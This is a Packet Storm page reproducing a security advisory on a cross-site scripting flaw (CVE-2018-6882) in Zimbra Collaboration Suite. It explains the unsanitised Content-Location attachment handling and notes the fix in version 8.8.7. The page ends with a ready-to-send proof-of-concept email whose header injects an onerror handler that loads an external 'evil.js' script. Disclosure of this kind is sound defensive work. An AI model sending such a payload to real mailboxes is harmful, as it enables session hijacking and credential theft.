Twenty Year Anniversary

Zimbra Collaboration Suite 8.7.11_GA_1854 Cross Site Scripting

Zimbra Collaboration Suite 8.7.11_GA_1854 Cross Site Scripting
Posted Mar 25, 2018
Authored by Securify B.V., Stephan Kaag

Zimbra Collaboration Suite version 8.7.11_GA_1854 suffers from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2018-6882
MD5 | 6de4d493c54ea789d91dbcba0df1db8b

Zimbra Collaboration Suite 8.7.11_GA_1854 Cross Site Scripting

Change Mirror Download
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Zimbra Collaboration Suite due to
the way it handles attachment links
------------------------------------------------------------------------
Stephan Kaag, January 2018

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting (XSS) vulnerability was found in Zimbra
Collaboration Suite (ZCS). This issue allows an attacker to perform a
wide variety of actions such as performing arbitrary actions on their
behalf or presenting a fake login screen to collect usernames and
passwords. In order to exploit this issue, the attacker has to lure a
victim into opening a specially crafted email in ZCS.

------------------------------------------------------------------------
See also
------------------------------------------------------------------------
- CVE-2018-6882
- https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.7
- https://bugzilla.zimbra.com/show_bug.cgi?id=108786
- https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on ZCS 8.7.11_GA_1854 (build
20170531151956). It is however likely that this issue is present in all
versions of ZCS from version 8.5.0 on.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
The issue is fixed in Zimbra Collaboration Suite version 8.8.7.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20180101/cross-site-scripting-vulnerability-in-zimbra-collaboration-suite-due-to-the-way-it-handles-attachment-links.html

If an email is opened that contains one or more attachments, a link ('<a>' tag) is created for each attachment. The code responsible for doing this is contained in the ZmMailMsgView.getAttachmentLinkHtml function.

ZmMailMsgView.getAttachmentLinkHtml =
function(params) {
var html = [],
i = 0;
html[i++] = "<a class='AttLink' ";
[..]
var href = params.href || (params.jsHref && "javascript:;");
html[i++] = href ? "href='" + href + "' " : "";
[..]
html[i++] = "'>" + AjxStringUtil.htmlEncode(params.text) + "</a>";
return html.join("");
};

In the above code the value for params.href is taken directly from the Content-Location header in the message. No sanitization is performed, and the value in the header can be influenced by an attacker. As a result it is possible to inject arbitrary HTML or JavaScript in the '<a>'-tag.

To exploit this issue an attacker can send an email with a specially crafted Content-Location header to a victim user. When the victim opens this message the script code will be executed.
Proof of concept

The following proof of concept email can be used to demonstrate this issue. When opening this mail, a JavaScript file from an external location will be loaded in Zimbra.
---[snip]---
From: me@example.com
To: victim@example.com
Subject: Re: My message
MIME-Version: 1.0
Date: Thu, 4 Jan 2018 14:25:25 +0100 (CET)

Content-Type: multipart/mixed;
boundary="----=_Part_112602234_144352703.1515072325170"

------=_Part_112602234_144352703.1515072325170
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: 7bit


------=_Part_112602234_144352703.1515072325170
Content-Type: text/plain; name=attachment.txt
Content-Disposition: attachment; filename=attachment.txt
Content-Transfer-Encoding: base64
Content-Location: http://foo.bar'></a><img src=a onerror=window.x=document.createElement('script');window.x.src='https://s3-eu-west-1.amazonaws.com/eviljs/evil.js';document.body.appendChild(window.x)><a href='


YXR0YWNobWVudAo=
------=_Part_112602234_144352703.1515072325170--
---[snip]---

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

August 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    19 Files
  • 2
    Aug 2nd
    17 Files
  • 3
    Aug 3rd
    16 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    1 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    15 Files
  • 8
    Aug 8th
    9 Files
  • 9
    Aug 9th
    7 Files
  • 10
    Aug 10th
    10 Files
  • 11
    Aug 11th
    1 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    14 Files
  • 14
    Aug 14th
    18 Files
  • 15
    Aug 15th
    38 Files
  • 16
    Aug 16th
    16 Files
  • 17
    Aug 17th
    22 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close